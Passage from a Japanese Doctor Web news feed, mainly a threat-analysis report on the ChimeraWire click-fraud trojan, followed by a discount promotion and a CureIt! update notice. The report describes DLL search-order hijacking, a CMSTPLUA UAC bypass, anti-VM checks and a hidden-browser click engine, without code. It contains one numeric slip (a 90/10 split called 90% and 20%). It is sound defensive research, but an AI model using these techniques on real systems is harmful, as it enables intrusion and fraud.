&lt;p&gt;必要な権限で実行されると、&lt;a href="https://vms.drweb.co.jp/search/?q=Python.Downloader.208&amp;lng=ja"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;はパスワード保護されたアーカイブ&lt;span class="string"&gt;onedrive.zip&lt;/span&gt;をC2サーバーからダウンロードします。このアーカイブには次の感染段階である&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.DownLoader48.54318&amp;lng=ja"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt;がライブラリ&lt;span class="string"&gt;UpdateRingSettings.dll&lt;/span&gt;として含まれているほか、その動作に必要な追加のファイル（Windowsに組み込まれたOneDriveの一部であり有効なデジタル署名を持った正規アプリ&lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt;など）も格納されています。&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Python.Downloader.208&amp;lng=ja"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;はアーカイブを解凍すると、アプリ&lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt;がシステム起動時に実行されるようにするタスクをシステムスケジューラに作成します。次に&lt;a href="https://vms.drweb.co.jp/search/?q=Python.Downloader.208&amp;lng=ja"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;はこのアプリを起動しますが、このアプリもDLL検索順序ハイジャッキング脆弱性を持つため、OneDriveのコンポーネントと同じ名前が付いた悪意のあるライブラリ&lt;span class="string"&gt;UpdateRingSettings.dll&lt;/span&gt;（&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.DownLoader48.54318&amp;lng=ja"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt;）が自動的に読み込まれます。&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.DownLoader48.54318&amp;lng=ja"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt;はコントロールを掌握すると自身が人工的な環境で実行されているかどうかをチェックし、仮想マシンやデバッグモードで動作している徴候を検知すると動作を終了します。&lt;/p&gt;

&lt;p&gt;そのような徴候が検知されなかった場合、&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.DownLoader48.54318&amp;lng=ja"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt;はC2サーバーからペイロードとその復号化に使用するキーをダウンロードします。 &lt;/p&gt;

&lt;p&gt;復号化されたペイロードはシェルコードと実行ファイルを含んだZLIBコンテナで、&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.DownLoader48.54318&amp;lng=ja"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt;は復号化の後このコンテナを解凍しようとします。解凍に失敗した場合、トロイの木馬は自身を削除し、アクティブなプロセスを終了します。解凍に成功した場合はコントロールがシェルコードに受け渡され、このシェルコードが一緒に含まれている実行ファイルを解凍します。このファイルが感染の最終段階、すなわち最終的な目的であるトロイの木馬&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;です。&lt;/p&gt;

&lt;h3&gt;2つ目の感染チェーン&lt;/h3&gt;

&lt;p&gt;2つ目の感染チェーンはマルウェア&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.DownLoader48.61444&amp;lng=ja"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;から始まります。このマルウェアは起動されると管理者権限を持っているかどうかをチェックし、持っていない場合は取得しようとします。&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.DownLoader48.61444&amp;lng=ja"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;はセキュリティシステムをすり抜けるためにMasquerade PEB手法を使用しており、正規のプロセス&lt;span class="string"&gt;explorer.exe&lt;/span&gt;に偽装しています。&lt;/p&gt;

&lt;p&gt;次に、システムライブラリ&lt;span class="string"&gt;%SystemRoot%\System32\ATL.dll&lt;/span&gt;のコピーにパッチを適用します。そのために、&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.DownLoader48.61444&amp;lng=ja"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;はそのコンテンツを読み取り、復号化されたバイトコードとトロイの木馬ファイルへのパスをそこに追加します。そうして改変したコピーをファイル&lt;span class="string"&gt;dropper&lt;/span&gt;として、元々置かれていた同じディレクトリに保存します。その後、サービス&lt;span class="string"&gt;%SystemRoot%\System32\wbem&lt;/span&gt;と改変したライブラリのWindowsシェルCOMオブジェクトを初期化します。初期化に成功すると、&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.DownLoader48.61444&amp;lng=ja"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;はCMSTPLUA COMインターフェースを使用して、一部の古いCOMインターフェースによくある脆弱性を悪用することで管理者権限を取得しようと試みます。&lt;/p&gt;

&lt;p&gt;成功すると、改変されたライブラリ&lt;span class="string"&gt;dropper&lt;/span&gt;が&lt;span class="string"&gt;ATL.dll&lt;/span&gt;ファイルとしてディレクトリ&lt;span class="string"&gt;%SystemRoot%\System32\wbem&lt;/span&gt;にコピーされます。その後、&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.DownLoader48.61444&amp;lng=ja"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;はWindows Management Instrumentation&lt;span class="string"&gt;WmiMgmt.msc&lt;/span&gt;を起動します。その結果、システムアプリ&lt;span class="string"&gt;mmc.exe&lt;/span&gt;に存在するDLL検索順序ハイジャッキング脆弱性が悪用され、パッチの適用されたライブラリ&lt;span class="string"&gt;%SystemRoot%\System32\wbem\ATL.dll&lt;/span&gt;が自動的に読み込まれます。そしてこのライブラリが&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.DownLoader48.61444&amp;lng=ja"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;を再度、今度は管理者権限で実行します。&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.co.jp/static/new-www/news/2025/december/chimera_wire/02_Trojan.DownLoader48.61444_noadmin_en.png"&gt;
        &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/december/chimera_wire/02_Trojan.DownLoader48.61444_noadmin_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;管理者権限がない場合の&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.DownLoader48.61444&amp;lng=ja"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;の動作を示す図&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;管理者権限で実行されると、&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.DownLoader48.61444&amp;lng=ja"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;はC2サーバーからペイロードをダウンロードするための複数のPowerShellスクリプトを実行します。ダウンロードされるオブジェクトの 1 つが ZIP アーカイブ&lt;span class="string"&gt;one.zip&lt;/span&gt;で、これには1つ目の感染チェーンでダウンロードされるアーカイブ&lt;span class="string"&gt;onedrive.zip&lt;/span&gt;と同じファイル（正規アプリ&lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt;と、&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.DownLoader48.54318&amp;lng=ja"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt;である悪意のあるライブラリ&lt;span class="string"&gt;UpdateRingSettings.dll&lt;/span&gt;）が含まれています。&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.DownLoader48.61444&amp;lng=ja"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;はアーカイブを解凍し、 &lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt;がシステム起動時に実行されるようにするタスクをシステムスケジューラに作成した後、このアプリを起動します。1つ目の感染チェーン同様、&lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt;に存在するDLL検索順序ハイジャッキング脆弱性が悪用され、トロイの木馬ライブラリ&lt;span class="string"&gt;UpdateRingSettings.dll&lt;/span&gt;が自動的に読み込まれます。その後のシナリオは1つ目の感染チェーンと同じです。&lt;/p&gt;

&lt;p&gt;同時に、&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.DownLoader48.61444&amp;lng=ja"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;は2つ目のZIPアーカイブ&lt;span class="string"&gt;two.zip&lt;/span&gt;もダウンロードします。これには悪意のあるスクリプト&lt;a href="https://vms.drweb.co.jp/search/?q=Python.Downloader.208&amp;lng=ja"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;（&lt;span class="string"&gt;update.py&lt;/span&gt;）と、その実行に必要なファイルが含まれています。そのうちの1つが&lt;span class="string"&gt;Guardian.exe&lt;/span&gt;で、これは名前を変更されたPythonコンソールインタープリタ&lt;span class="string"&gt;pythonw.exe&lt;/span&gt;です。&lt;/p&gt;

&lt;p&gt;アーカイブを解凍すると、&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.DownLoader48.61444&amp;lng=ja"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;は&lt;span class="string"&gt;Guardian.exe&lt;/span&gt;がシステム起動時に実行されるようにするタスクをシステムスケジューラに作成します。さらに、このアプリを介して悪意のあるスクリプト&lt;a href="https://vms.drweb.co.jp/search/?q=Python.Downloader.208&amp;lng=ja"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;を直接実行します。&lt;/p&gt;

&lt;p&gt;1つ目の感染チェーンと同じプロセスを部分的に採用することで、脅威アクターは標的システムに&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;がダウンロードされる確率を高めようと目論んだものとみられます。&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.co.jp/static/new-www/news/2025/december/chimera_wire/03_Trojan.DownLoader48.61444_admin_en.png"&gt;
        &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/december/chimera_wire/03_Trojan.DownLoader48.61444_admin_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;管理者権限を取得した&lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.DownLoader48.61444&amp;lng=ja"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;の動作を示す図&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;Trojan.ChimeraWire&lt;/h3&gt;

&lt;blockquote&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;という名前は、異なる動物の身体的特徴をあわせ持つ神話上の怪物「chimera（キメラ）」と「wire（ワイヤー）」を組み合わせたものです。「chimera」は攻撃者が複数の手法（異なるプログラミング言語で書かれたダウンローダ型トロイの木馬の使用、アンチデバッグ技術の使用、感染プロセスにおける権限昇格）を用いるというそのハイブリッドな特徴を表しています。さらに、このトロイの木馬がさまざまなフレームワーク、プラグイン、そして密かにトラフィックをコントロールするための正規ソフトウェアを組み合わせたものであるという事実も反映しています。2つ目の単語「wire」はここに関わってきます。これはトロイの木馬が目に見えないところで悪意のあるネットワーク操作を実行するということを示しています。&lt;/blockquote&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;は標的のコンピューターに侵入するとサードパーティサイトからアーカイブ&lt;span class="string"&gt;chrome-win.zip&lt;/span&gt;をダウンロードします。このアーカイブにはWindows用のGoogle Chromeブラウザが含まれています。ここで注意したいのは、このサイトにはLinuxやmacOSなどの他のOS向けGoogle Chromeビルド（さまざまなハードウェアプラットフォーム用のものを含む）を含んだアーカイブも置かれているという点です。&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.co.jp/static/new-www/news/2025/december/chimera_wire/04_chrome_download.png"&gt;
        &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/december/chimera_wire/04_chrome_download.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;トロイの木馬が必要なアーカイブをダウンロードする、さまざまなGoogle Chromeビルドを提供するサイト&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;ブラウザがダウンロードされると、&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;はそこにCAPTCHAを自動で解決するよう設計されたアドオンNopeCHAとBusterを密かにインストールします。これらのアドオンはトロイの木馬が動作中に使用します。&lt;/p&gt;

&lt;p&gt;次に、ブラウザをデバッグモードでウィンドウを表示せずに起動します。これにより、ユーザーに気づかれることなく悪意のある動作を実行することが可能になります。その後、自動的に選択されたデバッグポートとの接続がWebSocketプロトコル経由で確立されます。&lt;/p&gt;

&lt;p&gt;続けて、トロイの木馬はタスクの受信へと進みます。C2サーバーにリクエストを送信し、応答としてBase64文字列を受け取ります。この文字列にはAES-GCMアルゴリズムで暗号化されたJSON形式での設定が含まれています。&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.co.jp/static/new-www/news/2025/december/chimera_wire/05_config.png"&gt;
        &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/december/chimera_wire/05_config.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;トロイの木馬がC2サーバーから受信する設定の例&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;この設定には、以下のタスクとそれに関連するパラメータが含まれています。&lt;/p&gt;
&lt;ul&gt;
    &lt;li&gt;対象とする検索エンジン（GoogleとBingに対応）&lt;/li&gt;
    &lt;li&gt;対象の検索エンジン内でサイトを検索し、それらを開くためのキーフレーズ&lt;/li&gt;
    &lt;li&gt;Webページ連続遷移の最大回数&lt;/li&gt;
    &lt;li&gt;Webページ上で自動クリックを実行するためのランダム分布&lt;/li&gt;
    &lt;li&gt;ページの読み込み待機時間&lt;/li&gt;
    &lt;li&gt;対象ドメイン&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;実際のユーザー操作をより高度に模倣し、途切れのないアクティビティを監視するシステムをすり抜けるために、この設定には作業セッションと作業セッションの間で一時停止するためのパラメータも含まれています。&lt;/p&gt;

&lt;h3&gt;ユーザーのマウスクリックを模倣&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;は次のタイプのクリックを実行することができます。&lt;/p&gt;
&lt;ul&gt;
    &lt;li&gt;検索結果をナビゲートするためのクリック&lt;/li&gt;
    &lt;li&gt;見つかった目的のリンクを新しいバックグラウンドタブで開くためのクリック&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;まず初めに、&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;は対象とする検索エンジンを使用して、設定内で指定されているドメインとキーフレーズでWebサイトを検索します。次に、検索結果に表示されたサイトを開き、ハイパーリンクを定義するHTML要素をすべて見つけ出します。トロイの木馬はこれらの要素をデータ配列にしてシャッフルし、そこに含まれるすべてのオブジェクトがWebページに表示された結果と異なる順番になるように並べ替えます。これは、クリック順序を追跡するWebサイトのボット対策機能を回避する目的で行われます。&lt;/p&gt;

&lt;p&gt;続けて、&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;は見つけたリンクとそこに含まれる文字列が設定内のテンプレートと一致するかどうかをチェックし、一致した数を計算します。トロイの木馬のその後の動作はこの一致数に応じて異なります。&lt;/p&gt;

&lt;p&gt;ページ上で十分な数の一致するリンクが見つかった場合、&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;はそのページをスキャンし、検出されたリンクを関連度の高い順に並べ替えます（キーフレーズに最も一致するものが最初にくるように）。その後、1つないしは複数の一致するリンクがクリックされます。&lt;/p&gt;

&lt;p&gt;指定されたテンプレートとの十分な数の一致がない場合や、まったく一致がない場合、&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;は実際の人間の行動を可能な限りそっくりに模倣する確率的行動モデルのアルゴリズムを使用し、設定内に含まれているパラメータと重み付け分布に基づいて開くリンクの数を決定します。たとえば、分布が&lt;span class="string"&gt;["1:90", "2:10"]&lt;/span&gt;の場合、トロイの木馬は90%の確率で1つのリンクをクリックし、20%の確率で2つのリンクをクリックします。つまり、リンクが1つクリックされる可能性が極めて高いということになります。&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;は先の工程で作成したデータ配列の中からリンクをランダムに選択してクリックを実行します。&lt;/p&gt;

&lt;p&gt;トロイの木馬が検索結果からリンクを開いてそのWebページ上でクリックを実行するたびに、指定されたタスクに応じて前のブラウザタブに戻るかまたは次のタブに進みます。そしてこの動作が、対象となるサイトでのクリック数の上限に達するまで繰り返されます。&lt;/p&gt;

&lt;p&gt;以下は、トロイの木馬がC2サーバーから受信したタスクで操作するように指示されていたWebサイトの例です。&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.co.jp/static/new-www/news/2025/december/chimera_wire/06_website.png"&gt;
        &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/december/chimera_wire/06_website.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.co.jp/static/new-www/news/2025/december/chimera_wire/07_website.png"&gt;
        &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/december/chimera_wire/07_website.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
    &lt;a class="preview" href="https://st.drweb.co.jp/static/new-www/news/2025/december/chimera_wire/08_website.png"&gt;
        &lt;img src="https://st.drweb.co.jp/static/new-www/news/2025/december/chimera_wire/08_website.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;トロイの木馬ChimeraWireならびにそのダウンロードに関与するマルウェアに関する詳細な技術的情報については、本調査レポートのPDFバージョンまたはDoctor Webウイルスライブラリを参照してください。&lt;/p&gt;

&lt;p&gt;
    &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;の詳細 ※英語
    &lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.DownLoader48.54600&amp;lng=ja"&gt;&lt;b&gt;Trojan.DownLoader48.54600&lt;/b&gt;&lt;/a&gt;の詳細 ※英語
    &lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.Starter.8377&amp;lng=ja"&gt;&lt;b&gt;Trojan.Starter.8377&lt;/b&gt;&lt;/a&gt;の詳細 ※英語
    &lt;a href="https://vms.drweb.co.jp/search/?q=Python.Downloader.208&amp;lng=ja"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;の詳細 ※英語
    &lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.DownLoader48.54318&amp;lng=ja"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt;の詳細 ※英語
    &lt;a href="https://vms.drweb.co.jp/search/?q=Trojan.DownLoader48.61444&amp;lng=ja"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;の詳細 ※英語
&lt;/p&gt;

&lt;h3&gt;結論&lt;/h3&gt;

&lt;p&gt;現在のところ、&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;の実行する悪意のあるアクティビティは、要するにWebサイトの人気度を高めることを目的としたクリック操作だけという比較的単純なものにとどまっています。しかしながら、このトロイの木馬がベースとするツールには、実際のユーザーによる操作を装った自動アクションなどといったより広範なタスクの実行を可能とする機能が備わっています。たとえば、悪意のある脅威アクターは&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;を使用して、広告目的のアンケートを実施するものなどあらゆるサイトのWebフォームに自動入力することができます。さらに、サイバースパイ活動やさまざまなデータベース（メールアドレス、電話番号などの）を構築するためのデータ自動収集を目的に、Webページの内容を読み取ったりそれらのスクリーンショットを撮ったりすることも可能です。 &lt;/p&gt;

&lt;p&gt;したがって、将来的にはこうした機能が完全に実装された&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;の新たなバージョンが登場するものと考えられます。Doctor Webではこのトロイの木馬の進化を引き続き監視していきます。&lt;/p&gt;

&lt;h3&gt;MITRE ATT&amp;CK®&lt;/h3&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Stage（段階）&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;Technique（技術・手法）&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;Execution（実行）&lt;/td&gt;
            &lt;td&gt;T1204：User execution（ユーザーによる実行）&lt;br /&gt;&lt;br /&gt;T1204.002：Malicious File（悪意のあるファイル）&lt;br /&gt;&lt;br /&gt;T1204.005：Malicious Library（悪意のあるライブラリ）&lt;br /&gt;&lt;br /&gt;T1059.001：PowerShell&lt;br /&gt;&lt;br /&gt;T1059.003：Windows Command Shell&lt;br /&gt;&lt;br /&gt;T1059.005：Visual Basic&lt;br /&gt;&lt;br /&gt;T1059.006：Python&lt;br /&gt;&lt;br /&gt;T1053.005：Scheduled Task（スケジュールされたタスク）&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Persistence（永続化）&lt;/td&gt;
            &lt;td&gt;T1547.001：Registry Run Keys / Startup Folder （レジストリRunキー/スタートアップフォルダ）&lt;br /&gt;&lt;br /&gt;T1053：Scheduled Task/Job（スケジュールされたタスク/ジョブ）&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Privilege Escalation（権限昇格）&lt;/td&gt;
            &lt;td&gt;T1574.001：Hijack Execution Flow: DLL （実行フローのハイジャック：DLL）&lt;br /&gt;&lt;br /&gt;T1548.002：Bypass User Account Control （ユーザーアカウント制御のバイパス）&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Defense Evasion（防御回避）&lt;/td&gt;
            &lt;td&gt;T1027.013：Encrypted/Encoded File（暗号化/エンコードされたファイル）&lt;br /&gt;&lt;br /&gt;T1622：Debugger Evasion（デバッガ回避&lt;br /&gt;&lt;br /&gt;T1564.003：Hidden Window （非表示ウィンドウ）&lt;br /&gt;&lt;br /&gt;T1564.012：File/Path Exclusions（ファイル/パスの除外）&lt;br /&gt;&lt;br /&gt;T1140：Deobfuscate/Decode Files or Information（ファイルまたは情報の難読化解除/デコード）&lt;br /&gt;&lt;br /&gt;T1574.001：Hijack Execution Flow: DLL （実行フローのハイジャック：DLL）&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Command and Control（コマンド・アンド・コントロール）&lt;/td&gt;
            &lt;td&gt;T1102.002：Bidirectional Communication（双方向通信）&lt;br /&gt;&lt;br /&gt;T1071.001：Web Protocols（Webプロトコル）&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;

&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Trojan.ChimeraWire/README.adoc" target="_blank"&gt;Indicators of compromise（セキュリティ侵害インジケーター）&lt;/a&gt;</description></item><item><guid>https://news.drweb.co.jp/show/?i=15089&amp;lng=ja</guid><title>日本での15周年を記念して Dr.Web の総合セキュリティを 50%オフ で提供する特別キャンペーンを実施！</title><link>https://news.drweb.co.jp/show/?i=15089&amp;lng=ja&amp;c=5</link><pubDate>Mon, 01 Dec 2025 06:32:31 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Doctor Web Pacific, Inc. は、日本のユーザーをサイバー脅威から守り続けて15周年を迎えました。&lt;br&gt;これまでのご愛顧に感謝を込めて、対象製品を 50%割引 で購入できる記念キャンペーンを実施いたします。&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;■キャンペーン概要&lt;/strong&gt;&lt;br&gt;●対象製品&lt;br&gt;・Dr.Web Security Space&lt;br&gt;・Dr.Web Security Space for Mobile Devices&lt;/p&gt;&lt;p&gt;●割引内容&lt;br&gt;上記製品を通常価格の50%オフ&lt;/p&gt;&lt;p&gt;●選べるライセンス構成&lt;br&gt;・利用期間：1年 または 3年&lt;br&gt;・デバイス数：1台 / 3台 / 5台&lt;/p&gt;&lt;p&gt;●実施期間&lt;br&gt;2025年12月1日 ～ 2026年1月31日&lt;/p&gt;&lt;p&gt;&lt;strong&gt;■Dr.Web が提供する安心のセキュリティ&lt;/strong&gt;&lt;br&gt;Dr.Web ソリューションは、最新のサイバー脅威からパソコンやスマートフォンを強力に保護します。&lt;br&gt;・不正ログインの防止&lt;br&gt;・個人情報狙いの不正プログラム対策&lt;br&gt;・フィッシング誘導の遮断&lt;br&gt;・危険リンク・有害サイトのブロック&lt;br&gt;・ランサムウェア等のマルウェア防御&lt;br&gt;Dr.Web は、堅牢な防御機能により、利用環境の安全性を維持します。&lt;/p&gt;&lt;p&gt;&lt;strong&gt;■今だけの特別価格で Dr.Web をお試しください&lt;/strong&gt;&lt;br&gt;15周年を記念した期間限定の大幅割引です。ぜひこの機会に、Dr.Web の強力なセキュリティをお得にご利用ください。&lt;br&gt;&lt;a class="btn" href="https://www.drweb.co.jp/landing/bday2025"&gt;50%割引で購入する&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.co.jp/show/?i=15084&amp;lng=ja</guid><title>Dr.Web CureIt!、マルウェアの隠蔽動作を解析して検出可能に</title><link>https://news.drweb.co.jp/show/?i=15084&amp;lng=ja&amp;c=5</link><pubDate>Thu, 20 Nov 2025 08:00:25 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Doctor Web は、無料ユーティリティ Dr.Web CureIt! のアップデートをリリースしました。今回のアップデートでは、マルウェアがアンチウイルスの除外リストに隠そうとするファイルやフォルダを検査できる新機能が追加されました。これにより、セキュリティシステムを意図的に無効化しようとする高度な脅威に対する重要な対策となります。&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;この新機能は、弊社の別製品 Dr.Web FixIt! の成功を背景に実現したものです。Dr.Web FixIt! は、Doctor Web のスペシャリストがインシデント調査や複雑な感染修復を行う際に使用するツールで、多くのマルウェアは侵入後、自身の実行ファイルをアンチウイルスの除外リストに追加しようとします。これによりアンチウイルスは悪意のあるオブジェクトを無視し、攻撃者がデータ窃取・ファイル暗号化・ボットネットによるリソース悪用などを自由に行える危険な状態が生まれます。&lt;br&gt;■ 新機能の概要&lt;/p&gt;&lt;ol&gt;&lt;li&gt;除外リストの自動解析&lt;br&gt;Dr.Web CureIt! はスキャン開始時に、PC にインストールされている、または OS に組み込まれたアンチウイルスの除外リストを自動で読み取り・解析します。&lt;/li&gt;&lt;li&gt;除外対象を徹底スキャン&lt;br&gt;除外リストに登録されているすべてのファイルおよびフォルダを、Dr.Web 